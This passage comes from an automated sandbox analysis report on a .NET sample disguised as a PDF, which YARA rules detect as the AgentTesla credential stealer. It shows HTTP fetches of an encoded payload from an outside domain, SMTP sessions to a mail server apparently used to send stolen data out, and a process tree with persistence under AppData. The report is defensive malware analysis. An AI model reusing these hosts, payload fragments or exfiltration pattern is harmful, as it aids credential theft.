                                                    Data Ascii: 7c97<p>GGFYjFiccFjFuFjFjFjFcFjFjFjFlAAFlAAFjFjFiLcFjFjFjFjFjFjFjFrcFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFilLFjFjFjFicFuiFiLrFicFjFiLjFYFljAFuuFiLcFiFGrFljAFuuFLcFijcFijAFiiAFulFiilFiicFiiiFijuFiicFYGFijYFulFYYFYGFiijFiijFiiiFiirFulFYLFijiFulFiicFiiGFiijFulFijAFiijFulFrLFGYFLuFulFijYFiiiFijjFijiFcrFiuFiuFijFurFjFjFjFjFjFjFjFLjFrYFjFjFGrFiFuFjFGrFiclFciFiLjFjFjFjFjFjFjFjFjFllcFjFucFjFiiFiFLjFjFjFLcFAFjFjFrFjFjFjFjFjFjFlllFiicFAFjFjFulFjFjFjFilLFAFjFjFjFjFilLFjFulFjFjFjFlFjFjFcFjFjFjFjFjFjFjFcFjFjFjFjFjFj
                                                    Feb 23, 2021 09:47:46.399477959 CET6139OUTGET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Feb 23, 2021 09:47:46.466350079 CET6141INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:47:46 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d24528de8c514e2616fdb192ac59864401614070066; expires=Thu, 25-Mar-21 08:47:46 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:09 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086fabc5050000c785a38f9000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PqUUXu4f1rvXuUMAw85%2BUdAfZLkjsnMxkPsovmI8ZRJbqT5G%2Bpn7ksmsX%2BCgTSflESwRS41rZId7b6ZftfKm%2Fa0%2Bzc225%2FpIDrz1ZxPt3XGQVZM%2F"}],"max_age":604800,"group":"cf-nel"}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625faf1b3911c785-AMS
                                                    Data Raw: 33 64 38 31 0d 0a 3c 70 3e 63 46 69 4c 72 46 4c 41 46 6c 63 63 46 6c 63 63 46 69 6a 4c 46 6c 41 75 46 59 75 46 69 63 46 6c 6c 6a 46 69 69 63 46 69 72 69 46 72 6c 46 6c 69 72 46 6c 69 72 46 4c 59 46 6c 75 63 46 72 4c 46 6c 6c 6a 46 47 41 46 6c 69 47 46 6c 75 41 46 69 41 75 46 47 6c 46 6c 69 4c 46 69 75 6c 46 6c 69 46 69 4c 63 46 69 4c 63 46 69 75 47 46 6c 72 46 6c 41 6a 46 69 41 6a 46 69 6c 6c 46 72 46 6c 46 69 63 47 46 69 69 47 46 6c 6a 46 69 4c 72 46 69 69 59 46 6c 69 72 46 69 6a 47 46 6c 75 75 46 69 75 72 46 47 6a 46 6c 6c 41 46 47 6a 46 6c 6c 4c 46 63 63 46 69 59 59 46 47 59 46 6c 69 59 46 69 69 75 46 6a 46 6c 41 69 46 69 41 63 46 72 6a 46 72 6a 46 6c 6a 69 46 59 6a 46 6c 41 6a 46 69 41 6a 46 72 69 46 6c 6a 69 46 4c 63 46 6c 6c 59 46 63 69 46 6c 6a 6a 46 4c 69 46 69 63 46 6c 63 63 46 69 75 41 46 69 75 41 46 75 4c 46 69 72 6c 46 72 69 46 69 59 6a 46 59 6c 46 63 46 69 41 59 46 47 72 46 6c 69 72 46 59 72 46 6c 41 69 46 6c 6c 46 69 72 75 46 6c 69 63 46 69 63 63 46 69 63 4c 46 63 6a 46 6c 63 75 46 69 72 6a 46 75 6a 46 69 47 6c 46 41 41 46 6c 69 63 46 69 69 59 46 69 69 59 46 69 46 69 41 6c 46 69 6c 4c 46 6c 47 46 6c 4c 46 69 47 75 46 69 69 72 46 69 41 46 59 4c 46 6c 4c 46 75 46 69 41 69 46 72 63 46 6c 75 47 46 69 69 47 46 6c 6a 46 69 4c 6a 46 47 59 46 69 6c 47 46 41 47 46 6c 6c 41 46 69 69 63 46 69 63 41 46 75 69 46 69 6a 72 46 75 75 46 6c 6c 6c 46 69 69 47 46 69 63 41 46 63 6a 46 69 4c 41 46 47 47 46 6c 6a 46 69 41 63 46 72 47 46 72 47 46 63 47 46 6c 6a 6c 46 59 69 46 6c 75 72 46 41 4c 46 6c 69 75 46 63 72 46 63 72 46 6c 41 6c 46 69 41 69 46 69 69 41 46 63 47 46 69 4c 63
                                                    Data Ascii: 3d81<p>cFiLrFLAFlccFlccFijLFlAuFYuFicFlljFiicFiriFrlFlirFlirFLYFlucFrLFlljFGAFliGFluAFiAuFGlFliLFiulFliFiLcFiLcFiuGFlrFlAjFiAjFillFrFlFicGFiiGFljFiLrFiiYFlirFijGFluuFiurFGjFllAFGjFllLFccFiYYFGYFliYFiiuFjFlAiFiAcFrjFrjFljiFYjFlAjFiAjFriFljiFLcFllYFciFljjFLiFicFlccFiuAFiuAFuLFirlFriFiYjFYlFcFiAYFGrFlirFYrFlAiFllFiruFlicFiccFicLFcjFlcuFirjFujFiGlFAAFlicFiiYFiiYFiFiAlFilLFlGFlLFiGuFiirFiAFYLFlLFuFiAiFrcFluGFiiGFljFiLjFGYFilGFAGFllAFiicFicAFuiFijrFuuFlllFiiGFicAFcjFiLAFGGFljFiAcFrGFrGFcGFljlFYiFlurFALFliuFcrFcrFlAlFiAiFiiAFcGFiLc


                                                    SMTP Packets

                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Feb 23, 2021 09:47:41.559540987 CET58749763103.17.211.69192.168.2.4220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:47:40 +0800
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    Feb 23, 2021 09:47:41.560544968 CET49763587192.168.2.4103.17.211.69EHLO 965543
                                                    Feb 23, 2021 09:47:41.785818100 CET58749763103.17.211.69192.168.2.4250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
                                                    250-SIZE 20971520
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    Feb 23, 2021 09:47:41.786395073 CET49763587192.168.2.4103.17.211.69STARTTLS
                                                    Feb 23, 2021 09:47:42.016181946 CET58749763103.17.211.69192.168.2.4220 TLS go ahead
                                                    Feb 23, 2021 09:47:47.613730907 CET58749765103.17.211.69192.168.2.4220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:47:46 +0800
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    Feb 23, 2021 09:47:47.613986015 CET49765587192.168.2.4103.17.211.69EHLO 965543
                                                    Feb 23, 2021 09:47:47.846470118 CET58749765103.17.211.69192.168.2.4250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
                                                    250-SIZE 20971520
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    Feb 23, 2021 09:47:47.846772909 CET49765587192.168.2.4103.17.211.69STARTTLS
                                                    Feb 23, 2021 09:47:48.083342075 CET58749765103.17.211.69192.168.2.4220 TLS go ahead
                                                    Feb 23, 2021 09:48:37.896342993 CET58749775103.17.211.69192.168.2.4220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:48:36 +0800
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    Feb 23, 2021 09:48:37.898952961 CET49775587192.168.2.4103.17.211.69EHLO 965543
                                                    Feb 23, 2021 09:48:38.129041910 CET58749775103.17.211.69192.168.2.4250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
                                                    250-SIZE 20971520
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    Feb 23, 2021 09:48:38.132936954 CET49775587192.168.2.4103.17.211.69STARTTLS
                                                    Feb 23, 2021 09:48:38.366513968 CET58749775103.17.211.69192.168.2.4220 TLS go ahead
                                                    Feb 23, 2021 09:48:43.099941015 CET58749776103.17.211.69192.168.2.4220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:48:41 +0800
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    Feb 23, 2021 09:48:43.100560904 CET49776587192.168.2.4103.17.211.69EHLO 965543
                                                    Feb 23, 2021 09:48:43.331737995 CET58749776103.17.211.69192.168.2.4250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
                                                    250-SIZE 20971520
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    Feb 23, 2021 09:48:43.332259893 CET49776587192.168.2.4103.17.211.69STARTTLS
                                                    Feb 23, 2021 09:48:43.568871021 CET58749776103.17.211.69192.168.2.4220 TLS go ahead

                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: A4-058000200390-10-14_REV_pdf.exe PID: 7040 Parent PID: 5816

                                                    General

                                                    Start time:09:46:47
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe'
                                                    Imagebase:0x8a0000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Analysis Process: cmd.exe PID: 1364 Parent PID: 7040

                                                    General

                                                    Start time:09:46:54
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: conhost.exe PID: 6328 Parent PID: 1364

                                                    General

                                                    Start time:09:46:54
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: timeout.exe PID: 2228 Parent PID: 1364

                                                    General

                                                    Start time:09:46:54
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 1
                                                    Imagebase:0x1300000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: A4-058000200390-10-14_REV_pdf.exe PID: 1572 Parent PID: 7040

                                                    General

                                                    Start time:09:46:57
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    Imagebase:0xa50000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.912000692.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Analysis Process: WerFault.exe PID: 6300 Parent PID: 7040

                                                    General

                                                    Start time:09:46:59
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588
                                                    Imagebase:0x240000
                                                    File size:434592 bytes
                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    Analysis Process: NewApp.exe PID: 2092 Parent PID: 3424

                                                    General

                                                    Start time:09:47:32
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                    Imagebase:0xc00000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 13%, ReversingLabs
                                                    Reputation:low

                                                    Analysis Process: NewApp.exe PID: 1216 Parent PID: 3424

                                                    General

                                                    Start time:09:47:40
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                    Imagebase:0x230000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.832293360.000000000380F000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Analysis Process: cmd.exe PID: 7132 Parent PID: 2092

                                                    General

                                                    Start time:09:47:45
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: conhost.exe PID: 1440 Parent PID: 7132

                                                    General

                                                    Start time:09:47:46
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: timeout.exe PID: 6576 Parent PID: 7132

                                                    General

                                                    Start time:09:47:46
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 1
                                                    Imagebase:0x1300000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: NewApp.exe PID: 6416 Parent PID: 2092

                                                    General

                                                    Start time:09:47:50
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Imagebase:0x520000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.911999717.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Analysis Process: WerFault.exe PID: 4112 Parent PID: 2092

                                                    General

                                                    Start time:09:47:51
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1956
                                                    Imagebase:0x240000
                                                    File size:434592 bytes
                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    Analysis Process: cmd.exe PID: 4488 Parent PID: 1216

                                                    General

                                                    Start time:09:47:52
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: conhost.exe PID: 3480 Parent PID: 4488

                                                    General

                                                    Start time:09:47:52
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: timeout.exe PID: 5032 Parent PID: 4488

                                                    General

                                                    Start time:09:47:52
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 1
                                                    Imagebase:0x1300000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: NewApp.exe PID: 1504 Parent PID: 1216

                                                    General

                                                    Start time:09:47:57
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Imagebase:0xce0000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Analysis Process: WerFault.exe PID: 1716 Parent PID: 1216

                                                    General

                                                    Start time:09:48:00
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1868
                                                    Imagebase:0x240000
                                                    File size:434592 bytes
                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >